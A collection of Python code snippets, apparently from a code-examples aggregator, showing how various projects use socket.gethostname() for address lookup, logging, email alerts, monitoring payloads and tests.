Example #1
def getHostLocalAddress(self):
    # assumes module-level: import socket; from sys import platform
    if platform == "darwin":
        # On OS X the bare hostname may not resolve; append ".local" if missing
        hostname = socket.gethostname()
        if '.local' not in hostname:
            hostname += '.local'
        return socket.gethostbyname(hostname)
    else:
        return socket.gethostbyname(socket.gethostname())
Example #2
def _doemail(request):
  cgiParams = request.GET
  assert 'recipients' in cgiParams and 'url' in cgiParams and 'title' in cgiParams, "Incomplete doemail, requires recipients, url, and title"
  import smtplib, httplib, urlparse
  from email.MIMEMultipart import MIMEMultipart
  from email.MIMEText import MIMEText
  from email.MIMEImage import MIMEImage
  url = cgiParams['url']
  title = cgiParams['title']
  recipients = cgiParams['recipients'].split(',')
  proto, server, path, query, frag = urlparse.urlsplit(url)
  if query: path += '?' + query
  conn = httplib.HTTPConnection(server)
  conn.request('GET',path)
  resp = conn.getresponse()
  assert resp.status == 200, "Failed HTTP response %s %s" % (resp.status, resp.reason)
  rawData = resp.read()
  conn.close()
  message = MIMEMultipart()
  message['Subject'] = "Graphite Image"
  message['To'] = ', '.join(recipients)
  message['From'] = 'frontend@%s' % socket.gethostname()
  text = MIMEText( "Image generated by the following graphite URL at %s\r\n\r\n%s" % (time.ctime(),url) )
  image = MIMEImage( rawData )
  image.add_header('Content-Disposition', 'attachment', filename=title + time.strftime("_%b%d_%I%M%p.png"))
  message.attach(text)
  message.attach(image)
  server = smtplib.SMTP(settings.SMTP_SERVER)
  server.sendmail('frontend@%s' % socket.gethostname(),recipients,message.as_string())
  server.quit()
  return stdout("Successfully sent %s to %s" % (url,cgiParams['recipients']))
def sentimentAnalysis(tweet_dict):
    analysis = {}

    logger.info(socket.gethostname() + " Start sentiment analysis " + view_name + ".")
    start_sentiment_time = time.time()
    for item in tweet_dict:
        try:
            (key, text) = item.split("@@##$$")
            testimonial = TextBlob(text)
            polarity = float(testimonial.sentiment[0])
        except:
            logger.info(socket.gethostname() + " cannot analysis word " + text + ".")
            continue

        if polarity > 0.0:
            try:
                analysis[key + "###positive"] += 1
            except:
                analysis[key + "###positive"] = 1
        elif polarity == 0.0:
            try:
                analysis[key + "###neutral"] += 1
            except:
                analysis[key + "###neutral"] = 1
        else:
            try:
                analysis[key + "###negative"] += 1
            except:
                analysis[key + "###negative"] = 1
    end_sentiment_time = time.time()
    sentiment_time = end_sentiment_time - start_sentiment_time
    logger.info(socket.gethostname() + " Finished sentiment analysis for " + str(sentiment_time) + "s.")
    for (item, count) in analysis.iteritems():
        print item, "######", count
Example #4
def _machine_id():
    """
    for informational purposes, try to get a machine unique id thing
    """
    if platform.isLinux():
        try:
            # why this? see: http://0pointer.de/blog/projects/ids.html
            with open('/var/lib/dbus/machine-id', 'r') as f:
                return f.read().strip()
        except:
            # Non-dbus using Linux, get a hostname
            return socket.gethostname()

    elif platform.isMacOSX():
        # Get the serial number of the platform
        import plistlib
        plist_data = subprocess.check_output(["ioreg", "-rd1", "-c", "IOPlatformExpertDevice", "-a"])

        if six.PY2:
            # Only API on 2.7
            return plistlib.readPlistFromString(plist_data)[0]["IOPlatformSerialNumber"]
        else:
            # New, non-deprecated 3.4+ API
            return plistlib.loads(plist_data)[0]["IOPlatformSerialNumber"]

    else:
        # Something else, just get a hostname
        return socket.gethostname()
Example #5
    def __init__(self, data_set_name, fixed_tags=None, variable_tags=None, data=None):
        self.data_set_name = str(data_set_name)

        # fixed_tags can optionally be provided in a dict upon DS declaration
        if fixed_tags==None:
            self.fixed_tags={'host':gethostname()}
        elif type(fixed_tags) is dict:
            self.fixed_tags = fixed_tags
            self.fixed_tags['host']=gethostname()
        else:
            print "ERROR: if passing fixed_tags, type must be a dict!"
            exit(1)

        # variable_tags can optionally be provided in a dict upon DS declaration
        if variable_tags==None:
            self.variable_tags = []
            if data != None: self.variable_tags.append({})
        elif type(variable_tags) is dict:
            self.variable_tags = [variable_tags]
        else:
            print "ERROR: if passing variable_tags, type must be a dict!"
            exit(1)

        # data can optionally be provided in a dict upon DS declaration
        if data==None:
            self.data = []
            if variable_tags != None: self.data.append({})
        elif type(data) is dict:
            self.data = [data]
        else:
            print "ERROR: if passing data, type must be a dict!"
            exit(1)
Example #6
def set_ip_dhcp():
    print "SET IP ADRESS  : DHCP"
    logging.info( "SET IP ADRESS  : DHCP")
    host_ip=socket.gethostbyname(socket.gethostname())
    get_ip=host_ip
    os.system('netsh interface ipv4 set address name="Ethernet" source=dhcp')
    i=0        
    while get_ip == host_ip :
        ip_t=socket.gethostbyname(socket.gethostname())
        if ip_t!='127.0.0.1':
            get_ip=ip_t
        if i==0:
            sys.stdout.write("Processing ") 
        else:
            sys.stdout.write(".")
        time.sleep(1)
        if i < 60: 
            i = i + 1
        else:
            print "WAIT ",i," SEC, STOPPED, IP ADDRESS :",get_ip
            logging.error( "WAIT "+i+" SEC, STOPPED, IP ADDRESS :",get_ip)
            break
    print ""   
    print "OK, IP ADRESS HOST FROM DHCP :",get_ip
    logging.info("OK, IP ADRESS HOST FROM DHCP :"+get_ip)
def rebuild(tokudb, builddir, tokudb_data, cc, cxx, tests):
    info('Building tokudb.')
    if not os.path.exists(builddir):
        os.mkdir(builddir)
    newenv = os.environ
    newenv['CC'] = cc
    newenv['CXX'] = cxx
    r = call(['cmake',
              '-DCMAKE_BUILD_TYPE=Debug',
              '-DUSE_GTAGS=OFF',
              '-DUSE_CTAGS=OFF',
              '-DUSE_ETAGS=OFF',
              '-DUSE_CSCOPE=OFF',
              '-DTOKUDB_DATA=%s' % tokudb_data,
              tokudb],
             env=newenv,
             cwd=builddir)
    if r != 0:
        send_mail(['*****@*****.**'], 'Stress tests on %s failed to build.' % gethostname(), '')
        error('Building the tests failed.')
        sys.exit(r)
    r = call(['make', '-j8'], cwd=builddir)
    if r != 0:
        send_mail(['*****@*****.**'], 'Stress tests on %s failed to build.' % gethostname(), '')
        error('Building the tests failed.')
        sys.exit(r)
Example #8
def _load_ips_gethostbyname():
    """load ip addresses with socket.gethostbyname_ex

    This can be slow.
    """
    global LOCALHOST
    try:
        LOCAL_IPS[:] = socket.gethostbyname_ex('localhost')[2]
    except socket.error:
        # assume common default
        LOCAL_IPS[:] = ['127.0.0.1']

    try:
        hostname = socket.gethostname()
        PUBLIC_IPS[:] = socket.gethostbyname_ex(hostname)[2]
        # try hostname.local, in case hostname has been short-circuited to
        # loopback
        if not hostname.endswith('.local') and all(ip.startswith('127') for ip in PUBLIC_IPS):
            PUBLIC_IPS[:] = socket.gethostbyname_ex(
                socket.gethostname() + '.local')[2]
    except socket.error:
        pass
    finally:
        PUBLIC_IPS[:] = uniq_stable(PUBLIC_IPS)
        LOCAL_IPS.extend(PUBLIC_IPS)

    # include all-interface aliases: 0.0.0.0 and ''
    LOCAL_IPS.extend(['0.0.0.0', ''])

    LOCAL_IPS[:] = uniq_stable(LOCAL_IPS)

    LOCALHOST = LOCAL_IPS[0]
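This snippet calls a helper, uniq_stable, that is not shown here; from its use it evidently deduplicates a list while preserving first-seen order. A minimal sketch of such a helper (an assumption, not the original implementation):

def uniq_stable(elems):
    """Return the unique elements of elems, keeping their first-seen order."""
    seen = set()
    out = []
    for x in elems:
        if x not in seen:
            seen.add(x)
            out.append(x)
    return out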
Example #9
def set_ip(host_ip):
    print ""
    print ""
    sys.stdout.write("SET IP STATIC ADRESS  :"+host_ip[0]+"     ")
    logging.info( "SET IP ADRESS  :"+host_ip[0])
    get_ip=socket.gethostbyname(socket.gethostname())
    if get_ip!=host_ip[0]:
        os.system('netsh interface ipv4 set address name="Ethernet" source=static address='+host_ip[0]+' mask='+host_ip[1]+' gateway='+host_ip[2])
        i=0        
        while get_ip != host_ip[0] :
            ip_t=socket.gethostbyname(socket.gethostname())
            if ip_t!='127.0.0.1':
                get_ip=ip_t
            
            if i==0:
                sys.stdout.write("Processing ") 
            else:
                sys.stdout.write(".")
            time.sleep(1)
            if i < 60: 
                i = i + 1
            else:
                sys.stdout.write( "    WAIT "+str(i)+" SEC STOPPED, IP ADDRESS :"+get_ip)
                break      
        sys.stdout.write("OK, SET STATIC IP ADRESS HOST :"+get_ip)
        logging.info("OK, SET STATIC IP ADRESS HOST :"+get_ip)
    else:
        sys.stdout.write("IP :"+str(host_ip)+" established")
        logging.error("IP :"+str(host_ip)+" established")
    def __init__(self, rule_file, discovery_server,
                 discovery_port, collector_addr):
        self.module = Module.COMPUTE_NODE_MGR
        self.module_id = ModuleNames[self.module]

        node_type = Module2NodeType[self.module]
        node_type_name = NodeTypeNames[node_type]
        self.sandesh_global = sandesh_global
        EventManager.__init__(self, rule_file, discovery_server,
                              discovery_port, collector_addr, sandesh_global)
        self.node_type = "contrail-vrouter"
        self.table = "ObjectVRouter"
        _disc = self.get_discovery_client()
        sandesh_global.init_generator(
            self.module_id, socket.gethostname(),
            node_type_name, self.instance_id, self.collector_addr,
            self.module_id, 8102, ['vrouter.loadbalancer',
                'nodemgr.common.sandesh'], _disc)
        sandesh_global.set_logging_params(enable_local_log=True)
        self.supervisor_serverurl = "unix:///var/run/supervisord_vrouter.sock"
        self.add_current_process()
        ConnectionState.init(sandesh_global, socket.gethostname(), self.module_id,
            self.instance_id,
            staticmethod(ConnectionState.get_process_state_cb),
            NodeStatusUVE, NodeStatus, self.table)

        self.lb_stats = LoadbalancerStatsUVE()
        self.send_system_cpu_info()
        self.third_party_process_dict = {}
Example #11
    def no_test_userandaddressinit(self):
        server = 'http://demo.opencastproject.org'
        user = '******';
        password = '******';
        hostname = 'rubenruaHost'
        address = '8.8.8.8'
        workflow = 'mini-full'
        workflow_parameters = 'uno:uno'
        workflow_parameters_2 = 'uno:uno;dos:dos'

        client = MHHTTPClient(server, user, password)
        self.assertEqual(client.hostname, 'GC-' + socket.gethostname())
        self.assertEqual(client.address, socket.gethostbyname(socket.gethostname()))

        client = MHHTTPClient(server, user, password, hostname)
        self.assertEqual(client.hostname, hostname)
        self.assertEqual(client.address, socket.gethostbyname(socket.gethostname()))

        client = MHHTTPClient(server, user, password, hostname, address)
        self.assertEqual(client.hostname, hostname)
        self.assertEqual(client.address, address)

        client = MHHTTPClient(server, user, password, hostname, address)
        self.assertEqual(client.workflow, 'full')
        self.assertEqual(client.workflow_parameters, {'trimHold': 'true'})

        client = MHHTTPClient(server, user, password, hostname, address, workflow, workflow_parameters)
        self.assertEqual(client.workflow, 'mini-full')
        self.assertEqual(client.workflow_parameters, {'uno': 'uno'})

        client = MHHTTPClient(server, user, password, hostname, address, workflow, workflow_parameters_2)
        self.assertEqual(client.workflow, 'mini-full')
        self.assertEqual(client.workflow_parameters, {'uno': 'uno', 'dos': 'dos'})
Example #12
def get_node_name():
    # Get all the nodes in the cluster
    cmd = 'kubectl --kubeconfig={} get no -o=json'.format(kubeconfig_path)
    cmd = cmd.split()
    deadline = time.time() + 60
    while time.time() < deadline:
        try:
            raw = check_output(cmd)
            break
        except CalledProcessError:
            hookenv.log('Failed to get node name for node %s.'
                        ' Will retry.' % (gethostname()))
            time.sleep(1)
    else:
        msg = 'Failed to get node name for node %s' % gethostname()
        raise GetNodeNameFailed(msg)

    result = json.loads(raw.decode('utf-8'))
    if 'items' in result:
        for node in result['items']:
            if 'status' not in node:
                continue
            if 'addresses' not in node['status']:
                continue

            # find the hostname
            for address in node['status']['addresses']:
                if address['type'] == 'Hostname':
                    if address['address'] == gethostname():
                        return node['metadata']['name']

                    # if we didn't match, just bail to the next node
                    break
    msg = 'Failed to get node name for node %s' % gethostname()
    raise GetNodeNameFailed(msg)
Example #13
def create_uid_email(username=None, hostname=None):
    """Create an email address suitable for a UID on a GnuPG key.

    :param str username: The username portion of an email address.  If None,
                         defaults to the username of the running Python
                         process.

    :param str hostname: The FQDN portion of an email address. If None, the
                         hostname is obtained from gethostname(2).

    :rtype: str
    :returns: A string formatted as <username>@<hostname>.
    """
    if hostname:
        hostname = hostname.replace(' ', '_')
    if not username:
        try: username = os.environ['LOGNAME']
        except KeyError: username = os.environ['USERNAME']

        if not hostname: hostname = gethostname()

        uid = "%s@%s" % (username.replace(' ', '_'), hostname)
    else:
        username = username.replace(' ', '_')
        if (not hostname) and (username.find('@') == 0):
            uid = "%s@%s" % (username, gethostname())
        elif hostname:
            uid = "%s@%s" % (username, hostname)
        else:
            uid = username

    return uid
Example #14
    def on_message(self, headers, body):
        # FIXME, don't hardcode keepalive topic name:
        if headers["destination"] == "/topic/keepalive":
            logging.debug("got keepalive message")
            response = {
                "host": socket.gethostname(),
                "script": os.path.basename(__file__),
                "timestamp": datetime.now().isoformat(),
            }
            stomp.send(body=json.dumps(response), destination="/topic/keepalive_response")

            return ()

        debug_msg = {
            "script": os.path.basename(__file__),
            "host": socket.gethostname(),
            "timestamp": datetime.now().isoformat(),
            "message": "received message from %s, before thread" % headers["destination"],
        }
        stomp.send(body=json.dumps(debug_msg), destination="/topic/keepalive_response")

        logging.info("Received stomp message: {message}".format(message=body))
        received_obj = None
        try:
            received_obj = json.loads(body)
        except ValueError as e:
            logging.error("Received invalid JSON: %s." % body)
            return

        handle_builder_event(received_obj)
        logging.info("Destination: %s" % headers.get("destination"))

        # Acknowledge that the message has been processed
        self.message_received = True
Example #15
def links(*screen):
    synergyconf = open(os.path.join(os.path.expanduser("~"), ".synergy.conf"), 'a')
    synergyconf.write('section: links\n')
    for y in screen[0]:
        if y is not None: ## If the comboBox is not empty
            subnames.append(y.split('_'))
        else:
            pass
    ### writing the host part ####
    synergyconf.write("\t%s:\n" % gethostname())
    for z in subnames:
            if z[0] == 'host':
                pass
            else:
                synergyconf.write("\t%s = %s\n" % (z[0], z[2]))

    ### writing the client part ###
    for clients in subnames:
        if clients[2] == gethostname():
            pass
        else:
            synergyconf.write("\t%s:\n" % clients[2])
            synergyconf.write("\t\t%s = %s\n" % (clients[1], gethostname()))

    synergyconf.write('end\n')
    synergyconf.close()
Example #16
def restartAndSendEmailAlert(restart, subject, msg, alertops = False):
	if restart:
		restart_msg = commands.getoutput("/etc/init.d/smartproxyd restart")
		# append restart msg:
		msg += "\n\nRestarting smartproxyd: %s\n\n" % restart_msg

	sender = 'root@%s' % socket.gethostname()
	receivers = EMAIL_NOTIFICATION_LIST
	# add ops to the receivers if necessary:
	if alertops:
		receivers.append(OPS_NOTIFICATION)

	server= smtplib.SMTP('localhost')

	# if we restarted, wait for a few seconds before appending the log, so that smartproxyd has time to start:
	if restart:
		time.sleep(5)

	# append the last 30 lines of the smartproxyd.log to the msg:
	log = commands.getoutput("tail -n 30 /var/log/lounge/smartproxyd.log")
	msg += "\n\nsmartproxyd.log (last 30 lines):\n" + log
	
	server.sendmail(sender, receivers,
                    ('From: %s\n'
                     + 'To: %s\n'
                     + 'Subject: %s: %s\n\n'
                     +  '%s') % (sender, COMMASPACE.join(receivers), socket.gethostname(), subject, msg))
	server.quit()
Example #17
def get_ip():
    """Provides an available network interface address, for example
       "192.168.1.3".

       A `NetworkError` exception is raised in case of failure."""
    try:
        try:
            ip = socket.gethostbyname(socket.gethostname())
        except socket.gaierror:  # for Mac OS X
            ip = socket.gethostbyname(socket.gethostname() + ".local")
    except socket.gaierror:
        # sometimes the hostname doesn't resolve to an ip address, in which
        # case this will always fail
        ip = None

    if (ip is None or ip.startswith("127.")) and mozinfo.isLinux:
        interfaces = _get_interface_list()
        for ifconfig in interfaces:
            if ifconfig[0] == 'lo':
                continue
            else:
                return ifconfig[1]

    if ip is None:
        raise NetworkError('Unable to obtain network address')

    return ip
Example #18
	def handle_line(self, configFileName, fileName, line):
		"""docstring for handle_line""" 
		#print "==> %s <==" % fileName
		#print line,
		if self.isalertmatch(line):
			eventType = 'ALERT'
			severity = 'RED'
		elif self.isclearmatch(line):
			eventType = 'CLEAR'
			severity = 'WHITE'
		else:
			return

		if self.escalationType == "Email":
			e = Email("halavin@localhost", "Alert Email", configFileName + "::" + fileName + "::" + line)
			e.sendemail()
			e = None
		elif self.escalationType == "SnmpTrap":
			st = SnmpTrap()
			st.sendTrap(socket.gethostname(), 
					socket.gethostname(),
					eventType,
					severity,
					configFileName+"::"+fileName,
					configFileName+"::"+fileName+"::"+line 
				)
		elif self.escalationType == "Log":
			pass
		else:
			# else just print it on the screen
			print "%s::%s::%s:%s" % ("ALERT", configFileName, fileName, line),
Example #19
def send_email(request):
  try:
    recipients = request.GET['to'].split(',')
    url = request.GET['url']
    proto, server, path, query, frag = urlsplit(url)
    if query: path += '?' + query
    conn = HTTPConnection(server)
    conn.request('GET',path)
    resp = conn.getresponse()
    assert resp.status == 200, "Failed HTTP response %s %s" % (resp.status, resp.reason)
    rawData = resp.read()
    conn.close()
    message = MIMEMultipart()
    message['Subject'] = "Graphite Image"
    message['To'] = ', '.join(recipients)
    message['From'] = 'composer@%s' % gethostname()
    text = MIMEText( "Image generated by the following graphite URL at %s\r\n\r\n%s" % (ctime(),url) )
    image = MIMEImage( rawData )
    image.add_header('Content-Disposition', 'attachment', filename="composer_" + strftime("%b%d_%I%M%p.png"))
    message.attach(text)
    message.attach(image)
    s = SMTP(settings.SMTP_SERVER)
    s.sendmail('composer@%s' % gethostname(),recipients,message.as_string())
    s.quit()
    return HttpResponse( "OK" )
  except:
    return HttpResponse( format_exc() )
Example #20
    def is_local(self, hosts):
        if 0 == len(self.local_names):
            self.local_names.append('localhost')
            self.local_names.append(socket.gethostname().lower())
            try:
                # gethostbyname_ex returns (name, aliases, ip_list); extend so
                # each IP is stored as its own entry rather than a nested list
                self.local_names.extend(socket.gethostbyname_ex(socket.gethostname())[-1])
            except socket.gaierror:
                # TODO Append local IP address to local_names
                pass

        for s in hosts:
            s = s.lower()
            if s.startswith('127.') \
                    or s.startswith('192.168.') \
                    or s.startswith('10.') \
                    or s.startswith('169.254.') \
                    or s in self.local_names:
                print s
                return True

            for h in config.PROXY_HOSTS_ONLY:
                # if PROXY_HOSTS_ONLY is not empty
                # only proxy these hosts
                if s.endswith(h):
                    return False

        if len(config.PROXY_HOSTS_ONLY) > 0:
            return True
        else:
            return False
Example #21
def dump_bug (level, etype, msg, location=None, nhdf=None):
    global DISABLE_DUMP
    if DISABLE_DUMP: return

    now = int(time.time())
    pid = os.getpid()

    import neo_cgi, neo_util
    hdf = neo_util.HDF()
    hdf.setValue("Required.Level", level)
    hdf.setValue("Required.When", str(int(time.time())))
    hdf.setValue("Required.Type", etype)
    hdf.setValue("Required.Title", msg)
    hdf.setValue("Optional.Hostname", socket.gethostname())
    if location:
        hdf.setValue("Optional.Location", location)

    for (key, value) in os.environ.items():
        hdf.setValue ("Environ.%s" % key, value)

    global Count
    Count = Count + 1
    fname = "%d.%d_%d.%s" % (now, pid, Count, socket.gethostname())
    checkPaths()

    tpath = os.path.join (DUMP_DIR, "tmp", fname)
    npath = os.path.join (DUMP_DIR, "new", fname)
    hdf.writeFile(tpath)
    os.rename(tpath, npath)
Example #22
    def api_publish(self, end_point = None):
        self._debug['msg_pubs'] += 1
        ctype = bottle.request.headers['content-type']
        json_req = {}
        if ctype == 'application/json':
            data = bottle.request.json
            for service_type, info in data.items():
                json_req['name'] = service_type
                json_req['info'] = info
        elif ctype == 'application/xml':
            data = xmltodict.parse(bottle.request.body.read())
            for service_type, info in data.items():
                json_req['name'] = service_type
                json_req['info'] = dict(info)
        else:
            bottle.abort(400, 'content type must be application/json or application/xml')

        sig = end_point or publisher_id(
                bottle.request.environ['REMOTE_ADDR'], json.dumps(json_req))

        # Rx {'name': u'ifmap-server', 'info': {u'ip_addr': u'10.84.7.1',
        # u'port': u'8443'}}
        info = json_req['info']
        service_type = json_req['name']

        entry = self._db_conn.lookup_service(service_type, service_id=sig)
        if not entry:
            entry = {
                'service_type': service_type,
                'service_id': sig,
                'in_use': 0,
                'ts_use': 0,
                'ts_created': int(time.time()),
                'prov_state': 'new',
                'remote': bottle.request.environ.get('REMOTE_ADDR'),
                'sequence': str(int(time.time())) + socket.gethostname(),
            }
        elif 'sequence' not in entry or self.service_expired(entry):
            # handle upgrade or republish after expiry
            entry['sequence'] = str(int(time.time())) + socket.gethostname()

        entry['info'] = info
        entry['admin_state'] = 'up'
        entry['heartbeat'] = int(time.time())

        # insert entry if new or timed out
        self._db_conn.update_service(service_type, sig, entry)

        response = {'cookie': sig + ':' + service_type}
        if ctype != 'application/json':
            response = xmltodict.unparse({'response': response})

        self.syslog('publish service "%s", sid=%s, info=%s'
                    % (service_type, sig, info))

        if not service_type.lower() in self.service_config:
            self.service_config[
                service_type.lower()] = self._args.default_service_opts

        return response
Example #23
	def sendCommunicationAlertClear(self):

		if not self.communicationAlertSent:
			return True

		subject = "[alertR] (%s) Communication problems solved" \
			% socket.gethostname()

		message = "The communication problems between the host '%s' " \
			% socket.gethostname() \
			+ "and the server were solved."

		emailHeader = "From: %s\r\nTo: %s\r\nSubject: %s\r\n" \
			% (self.fromAddr, self.toAddr, subject)

		# sending eMail alert to configured smtp server
		logging.info("[%s]: Sending eMail alert to %s." 
			% (self.fileName, self.toAddr))
		try:
			smtpServer = smtplib.SMTP(self.host, self.port)
			smtpServer.sendmail(self.fromAddr, self.toAddr, 
				emailHeader + message)
			smtpServer.quit()
		except Exception as e:
			logging.exception("[%s]: Unable to send eMail alert. " 
				% self.fileName)
			return False

		# clear flag that a communication alert was sent before exiting
		self.communicationAlertSent = False

		return True
Example #24
	def __init__(self, debug=False):
		self.debug  = debug
		if self.debug:
			logLevel = logging.DEBUG
		else:
			logLevel = logging.INFO
		logging.basicConfig(format='%(levelname)s: %(message)s', level=logLevel)

		if not os.path.isdir(self.OUTPUT_DIR):
			os.mkdir(self.OUTPUT_DIR)
		if not os.path.isdir(self.UNPROCESSED_DIR):
			os.mkdir(self.UNPROCESSED_DIR)
		if not os.path.isdir(self.PROCESSED_DIR):
			os.mkdir(self.PROCESSED_DIR)
		if not os.path.isdir(self.PROCESSING_DIR):
			os.mkdir(self.PROCESSING_DIR)
		self.db = DB(debug = self.debug)
		self.rsync = rsync( self.debug )

		if socket.gethostname() == 'cet-sif':
			self.OnServer = True
			# self.host = socket.gethostbyname( 'cet-research.colorado.edu' )
			self.host = '128.138.248.205'
		else:
			self.OnServer = False
			self.host = socket.gethostbyname(socket.gethostname())
Example #25
	def sendCommunicationAlert(self, connectionRetries):

		if self.communicationAlertSent:
			return True

		subject = "[alertR] (%s) Communication problems detected" \
			% socket.gethostname()

		message = "Communication problems detected between the host '%s' " \
			% socket.gethostname() \
			+ "and the server. The host '%s' was not able to establish " \
			% socket.gethostname() \
			+ "a connection after %d retries." \
			% connectionRetries

		emailHeader = "From: %s\r\nTo: %s\r\nSubject: %s\r\n" \
			% (self.fromAddr, self.toAddr, subject)

		# sending eMail alert to configured smtp server
		logging.info("[%s]: Sending eMail alert to %s." 
			% (self.fileName, self.toAddr))
		try:
			smtpServer = smtplib.SMTP(self.host, self.port)
			smtpServer.sendmail(self.fromAddr, self.toAddr, 
				emailHeader + message)
			smtpServer.quit()
		except Exception as e:
			logging.exception("[%s]: Unable to send eMail alert. " 
				% self.fileName)
			return False

		# set flag that a communication alert was sent before exiting
		self.communicationAlertSent = True

		return True
Example #26
 def test_bulkadd(self):
   app_id = 'test_app'
   bulk_add_request = taskqueue_service_pb.TaskQueueBulkAddRequest()
   item = bulk_add_request.add_add_request()
   item.set_app_id(app_id)
   item.set_queue_name('default') 
   item.set_task_name('babaganoose')
   item.set_eta_usec(0)
   item.set_method(taskqueue_service_pb.TaskQueueAddRequest.GET)
   item.set_mode(taskqueue_service_pb.TaskQueueMode.PUSH)
   host = socket.gethostbyname(socket.gethostname())
   item.set_url('http://' + host + ':64839/queues') 
   host = socket.gethostbyname(socket.gethostname())
   req = urllib2.Request('http://' + host + ':64839')
   api_request = remote_api_pb.Request()
   api_request.set_method("BulkAdd")
   api_request.set_service_name("taskqueue")
   api_request.set_request(bulk_add_request.Encode())
   remote_request = api_request.Encode()
   req.add_header('Content-Length', str(len(remote_request)))
   req.add_header('protocolbuffertype', 'Request') 
   req.add_header('appdata', app_id) 
   response = urllib2.urlopen(req, remote_request)
   api_response = response.read()
   api_response = remote_api_pb.Response(api_response) 
   bulk_add_response = taskqueue_service_pb.TaskQueueBulkAddResponse(api_response.response())
   print bulk_add_response
   self.assertEquals(response.getcode(), 200)
Example #27
 def test_bulkadd(self):
     app_id = "test_app"
     bulk_add_request = taskqueue_service_pb.TaskQueueBulkAddRequest()
     item = bulk_add_request.add_add_request()
     item.set_app_id(app_id)
     item.set_queue_name("default")
     item.set_task_name("babaganoose")
     item.set_method(taskqueue_service_pb.TaskQueueAddRequest.GET)
     item.set_mode(taskqueue_service_pb.TaskQueueMode.PUSH)
     item.set_eta_usec(5000000)  # 5 seconds
     host = socket.gethostbyname(socket.gethostname())
     item.set_url("http://" + host + ":64839/queues")
     host = socket.gethostbyname(socket.gethostname())
     req = urllib2.Request("http://" + host + ":64839")
     api_request = remote_api_pb.Request()
     api_request.set_method("BulkAdd")
     api_request.set_service_name("taskqueue")
     api_request.set_request(bulk_add_request.Encode())
     remote_request = api_request.Encode()
     req.add_header("Content-Length", str(len(remote_request)))
     req.add_header("protocolbuffertype", "Request")
     req.add_header("appdata", app_id)
     response = urllib2.urlopen(req, remote_request)
     api_response = response.read()
     api_response = remote_api_pb.Response(api_response)
     bulk_add_response = taskqueue_service_pb.TaskQueueBulkAddResponse(api_response.response())
     print bulk_add_response
     self.assertEquals(response.getcode(), 200)
Example #28
def main():
    components = []

    processes, license = read_config()
    pids = find_pid(processes)

    LOG.info("Watching process:" )

    for pid in pids:
        collection = []
        metrics = dict()
        process = psutil.Process(pid.pid)
    
        collection.append(get_cpu_stats(process))
        collection.append(get_net_stats(process))
        collection.append(get_vm_stats(process))
        collection.append(get_io_stats(process))
    
        for metric in collection:
            for data in metric.metrics:
                namespace = ''
                unit = ''
                section = metric.t_class
                name = data.name
    
                if data.namespace:
                    namespace = data.namespace + "/"
    
                if data.unit:
                    unit = "[" + data.unit + "]"
    
                key = "Component/%(section)s/%(namespace)s%(name)s%(unit)s" % locals()
                value = data.metric
                metrics[key] = value

        component_template = {
            "name": "%s-%s-%s" % (str(pid.pid), pid.name(), gethostname()),
            "guid": GUID,
            "duration" : 60,
            "metrics" : metrics       
        }

        components.append(component_template)
    
    
    payload = {
      "agent": {
        "host" : gethostname(),
        "pid" : getpid(),
        "version" : "1.0.0"
      },
      "components": components
    }
    
    LOG.debug("Sending payload\n: %s", payload)
    
    headers = {"X-License-Key": license, "Content-Type":"application/json", "Accept":"application/json"}
    request = requests.post(url=URL, headers=headers, data=json.dumps(payload))
    LOG.debug("Newrelic response code: %s" ,request.status_code)
    print request.text
Example #29
    def network_details():
        """
        Returns details about the network links
        """
        # Get IPv4 details
        ipv4_addresses = [info[4][0] for info in socket.getaddrinfo(
            socket.gethostname(), None, socket.AF_INET)]

        # Add localhost
        ipv4_addresses.extend(info[4][0] for info in socket.getaddrinfo(
            "localhost", None, socket.AF_INET))

        # Filter addresses
        ipv4_addresses = sorted(set(ipv4_addresses))

        try:
            # Get IPv6 details
            ipv6_addresses = [info[4][0] for info in socket.getaddrinfo(
                socket.gethostname(), None, socket.AF_INET6)]

            # Add localhost
            ipv6_addresses.extend(info[4][0] for info in socket.getaddrinfo(
                "localhost", None, socket.AF_INET6))

            # Filter addresses
            ipv6_addresses = sorted(set(ipv6_addresses))
        except (socket.gaierror, AttributeError):
            # AttributeError: AF_INET6 is missing in some versions of Python
            ipv6_addresses = None

        return {"IPv4": ipv4_addresses, "IPv6": ipv6_addresses,
                "host.name": socket.gethostname(),
                "host.fqdn": socket.getfqdn()}
Example #30
    def test_check_for_setup_error(self, vgs):
        vg_obj = fake_lvm.FakeBrickLVM('cinder-volumes',
                                       False,
                                       None,
                                       'default')

        configuration = conf.Configuration(fake_opt, 'fake_group')
        lvm_driver = lvm.LVMVolumeDriver(configuration=configuration,
                                         vg_obj=vg_obj, db=db)

        lvm_driver.delete_snapshot = mock.Mock()

        volume = tests_utils.create_volume(self.context,
                                           host=socket.gethostname())
        volume_id = volume['id']

        backup = {}
        backup['volume_id'] = volume_id
        backup['user_id'] = fake.USER_ID
        backup['project_id'] = fake.PROJECT_ID
        backup['host'] = socket.gethostname()
        backup['availability_zone'] = '1'
        backup['display_name'] = 'test_check_for_setup_error'
        backup['display_description'] = 'test_check_for_setup_error'
        backup['container'] = 'fake'
        backup['status'] = fields.BackupStatus.CREATING
        backup['fail_reason'] = ''
        backup['service'] = 'fake'
        backup['parent_id'] = None
        backup['size'] = 5 * 1024 * 1024
        backup['object_count'] = 22
        db.backup_create(self.context, backup)

        lvm_driver.check_for_setup_error()
Example #31
    def get_dio(self):
        """
        a wrapper to get digital state from the device handler process

        Returns
        -------
        value :: integer

        Examples
        --------
        >>> value = client.get_dio()
        """
        return self.dio.read().data[0]

    def set_dio(self, value):
        """
        a wrapper to get digital state from the device handler process

        Parameters
        ----------
        value :: integer

        Returns
        -------

        Examples
        --------
        >>> client.set_dio(127)
        """
        result = self.dio.write(value)

if __name__ == '__main__':
    import socket
    SERVER_NAME = socket.gethostname()

    from icarus_nmr.device_client import Client
    client = Client(device_ca_server_prefix = f'device_{SERVER_NAME}:')
    self = client
Example #32
import os
import socket
import _thread
import json
import argparse
import time
import wx

parser = argparse.ArgumentParser(prog="client", conflict_handler="resolve")
host = socket.gethostname()
parser.add_argument("--host", "-h", type=str, default=host, help="host name (default: socket.gethostname())")
parser.add_argument("--port", "-p", type=int, default=8080, help="port number (default: 8080)")
parser.add_argument("--buffer-size", "-b", type=int, default=1024, help="buffer size of the receiver (default: 1024)")
parser.add_argument("--path", "-t", type=str, default="./data/", help="path of the download directory (default: ./data/)")
args = parser.parse_args()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = args.host
port = args.port
buffer_size = args.buffer_size
path = args.path

class client_app(wx.App):

	# overload the initializer
	def OnInit(self):
		sock.connect((host, port))
